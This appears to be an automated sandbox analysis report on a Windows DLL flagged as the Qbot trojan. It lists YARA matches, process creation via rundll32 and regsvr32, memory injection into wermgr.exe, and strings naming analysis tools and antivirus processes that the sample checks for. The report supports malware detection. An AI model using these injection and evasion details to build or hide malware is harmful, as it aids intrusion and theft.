          Source: 5.3.rundll32.exe.b90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.3.regsvr32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.3.regsvr32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA904A00_2_6DA904A0
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA9CC860_2_6DA9CC86
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA95CF60_2_6DA95CF6
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA979090_2_6DA97909
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA948FC0_2_6DA948FC
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA8F07E0_2_6DA8F07E
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DA8B2000_2_6DA8B200
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007435EE3_2_007435EE
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007429E93_2_007429E9
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007482A03_2_007482A0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0074676F3_2_0074676F
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_007463B03_2_007463B0
          Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6DA81730 appears 87 times
          Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6DA89CA0 appears 41 times
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0073D538 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,3_2_0073D538
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0073D9DE GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,3_2_0073D9DE
          Source: diatomaceous.dat.dll.7.drStatic PE information: No import functions for PE file found
          Source: diatomaceous.dat.dllBinary or memory string: OriginalFilenamegfngfhn sgedrl;fkweklnmgdfw8 vs diatomaceous.dat.dll
          Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\diatomaceous.dat.dll F892742F6C64A8991337FADDF84FBDB25C43022AC85C8BCC30D47FEBAFEA1D87
          Source: diatomaceous.dat.dll.7.drStatic PE information: Data appended to the last section found
          Source: diatomaceous.dat.dllReversingLabs: Detection: 73%
          Source: diatomaceous.dat.dllVirustotal: Detection: 77%
          Source: diatomaceous.dat.dllMetadefender: Detection: 44%
          Source: diatomaceous.dat.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll"
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\diatomaceous.dat.dll
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllRegisterServer
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllUnregisterServer
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\wermgr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Bwkwui
          Source: classification engineClassification label: mal96.troj.evad.winDLL@18/1@0/0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0073E485 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,3_2_0073E485
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0073BAF6 CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,3_2_0073BAF6
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1
          Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{8BD38B93-62A1-471F-A5AB-B91B963BC96D}
          Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{6A583BDA-7359-43D4-819F-474F9705BF6E}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_01
          Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{6A583BDA-7359-43D4-819F-474F9705BF6E}
          Source: diatomaceous.dat.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: y'E:\cpp\out\out\desktop.pdb source: loaddll32.exe, 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.320776013.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.320890751.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.320917782.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, diatomaceous.dat.dll
          Source: Binary string: E:\cpp\out\out\desktop.pdb source: loaddll32.exe, 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.320776013.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.320890751.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.320917782.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, diatomaceous.dat.dll
          Source: Binary string: amstream.pdb source: wermgr.exe, 00000007.00000003.321666613.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.321909283.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.322091592.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: rundll32.exe, 00000004.00000003.307936128.0000000003011000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.307949517.000000000301B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.307921567.0000000003004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.320543762.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: rundll32.exe, 00000004.00000003.307936128.0000000003011000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.307949517.000000000301B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.307921567.0000000003004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.320543762.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: wermgr.exe, 00000007.00000003.321666613.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.321909283.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.322091592.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp
          Source: diatomaceous.dat.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: diatomaceous.dat.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: diatomaceous.dat.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: diatomaceous.dat.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: diatomaceous.dat.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DA89B9F push ecx; ret 0_2_6DA89BB2
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0074B066 push ebx; ret 3_2_0074B067
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0074ADB4 push cs; iretd 3_2_0074AE8A
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0074AEB6 push cs; iretd 3_2_0074AE8A
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0074CB95 push esi; iretd 3_2_0074CB9A
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0073EF38 LoadLibraryA,GetProcAddress,3_2_0073EF38
          Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\diatomaceous.dat.dll
          Source: C:\Windows\SysWOW64\wermgr.exe File created: C:\Users\user\Desktop\diatomaceous.dat.dll (dropped file)

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 5020 base: 1173C50 value: E9 42 26 E9 FF
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 4768 base: 1173C50 value: E9 42 26 C9 FF
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 4860 base: 1173C50 value: E9 42 26 C9 FF
          Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: wermgr.exe, 00000007.00000003.323039882.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324363967.0000000004D56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXEJ
          Source: wermgr.exe, 00000007.00000003.323021064.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324329003.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TCPDUMP.EXEM
          Source: wermgr.exe, 00000007.00000003.323039882.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324363967.0000000004D56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DUMPCAP.EXEM
          Source: wermgr.exe, 00000007.00000003.323021064.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324329003.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
          Source: wermgr.exe, 00000007.00000003.323021064.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324329003.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
          Source: wermgr.exe, 00000007.00000003.323021064.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324329003.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINDUMP.EXER
          Source: wermgr.exe, 00000007.00000003.323021064.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324329003.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXEL
          Source: wermgr.exe, 00000007.00000003.323021064.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324329003.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXEK
          Source: wermgr.exe, 00000007.00000003.323021064.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324329003.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TCPDUMP.EXE
          Source: wermgr.exe, 00000007.00000003.323021064.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324329003.0000000004DD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINDUMP.EXE
          Source: wermgr.exe, 00000007.00000003.601336347.0000000004E12000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.601238980.0000000004E12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PROC_ANALYZER.EXE
          Source: wermgr.exe, 00000007.00000003.323039882.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324363967.0000000004D56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DUMPCAP.EXE
          Source: wermgr.exe, 00000007.00000003.323039882.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000007.00000003.324363967.0000000004D56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5068 Thread sleep count: 134 > 30
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 476 Thread sleep count: 113 > 30
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 64 Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 5188 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 5220 Thread sleep time: -83000s >= -30000s
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 5016 Thread sleep count: 47 > 30
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 2100 Thread sleep count: 45 > 30
          Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_3-14365
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wermgr.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_3-11539
          Source: C:\Windows\System32\loaddll32.exe API coverage: 6.6 %
          Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0073DDE7 GetSystemInfo,3_2_0073DDE7
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DA994B5 FindFirstFileExW,0_2_6DA994B5
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0073C123 FindFirstFileW,FindNextFileW,3_2_0073C123
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DA89EC6 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6DA89EC6
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0073EF38 LoadLibraryA,GetProcAddress,3_2_0073EF38
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DA9A32E GetProcessHeap,0_2_6DA9A32E
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DA91610 mov ecx, dword ptr fs:[00000030h] 0_2_6DA91610
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DA99229 mov eax, dword ptr fs:[00000030h] 0_2_6DA99229
          Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DA89EC6 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6DA89EC6
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DA8A11D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6DA8A11D
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DA8D8C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6DA8D8C3

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: 1030000
          Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: 1173C50
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: BF0000
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: 1173C50
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: BE0000
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: 1173C50
          Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 1030000 protect: page read and write
          Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: BF0000 protect: page read and write
          Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: BE0000 protect: page read and write
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1
          Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\wermgr.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\wermgr.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\loaddll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_6DA9BFAE
          Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_6DA9C73D
          Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,0_2_6DA9C614
          Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,0_2_6DA9C1A9
          Source: C:\Windows\System32\loaddll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_6DA9C912
          Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,0_2_6DA96812
          Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,0_2_6DA9C843
          Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_6DA9C3C1
          Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW,0_2_6DA9C336
          Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW,0_2_6DA96349
          Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW,0_2_6DA9C29B
          Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW,0_2_6DA9C250
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DA89CE5 cpuid 0_2_6DA89CE5
          Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DA89FEC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6DA89FEC
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0073DFC2 GetCurrentProcessId,GetLastError,GetSystemMetrics,GetVersionExA,GetWindowsDirectoryW,3_2_0073DFC2
          Source: regsvr32.exe, 00000003.00000003.313976995.0000000000C2F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.313977147.00000000049BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.314040424.00000000047FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bdagent.exe
          Source: regsvr32.exe, 00000003.00000003.313976995.0000000000C2F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.313977147.00000000049BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.314040424.00000000047FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vsserv.exe
          Source: regsvr32.exe, 00000003.00000003.313976995.0000000000C2F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.313977147.00000000049BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.314040424.00000000047FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
          Source: regsvr32.exe, 00000003.00000003.313976995.0000000000C2F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.313977147.00000000049BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.314040424.00000000047FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgcsrvx.exe
          Source: regsvr32.exe, 00000003.00000003.313976995.0000000000C2F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.313977147.00000000049BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.314040424.00000000047FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mcshield.exe
          Source: regsvr32.exe, 00000003.00000003.313976995.0000000000C2F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.313977147.00000000049BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.314040424.00000000047FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          Source: Yara matchFile source: 8.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.4820000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.3.rundll32.exe.b90000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.rundll32.exe.2fa0000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.rundll32.exe.2fa0000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.3.rundll32.exe.b90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3.regsvr32.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.730000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.rundll32.exe.2cc0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.730000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3.regsvr32.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.rundll32.exe.2cc0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.wermgr.exe.1000000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.4820000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.wermgr.exe.1000000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.320649129.0000000004820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.320603133.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.319688371.0000000001000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.312800639.0000000000400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.319841073.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.319924513.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.322491943.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.322126638.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara matchFile source: 8.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.4820000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.3.rundll32.exe.b90000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.rundll32.exe.2fa0000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.rundll32.exe.2fa0000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.3.rundll32.exe.b90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3.regsvr32.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPE
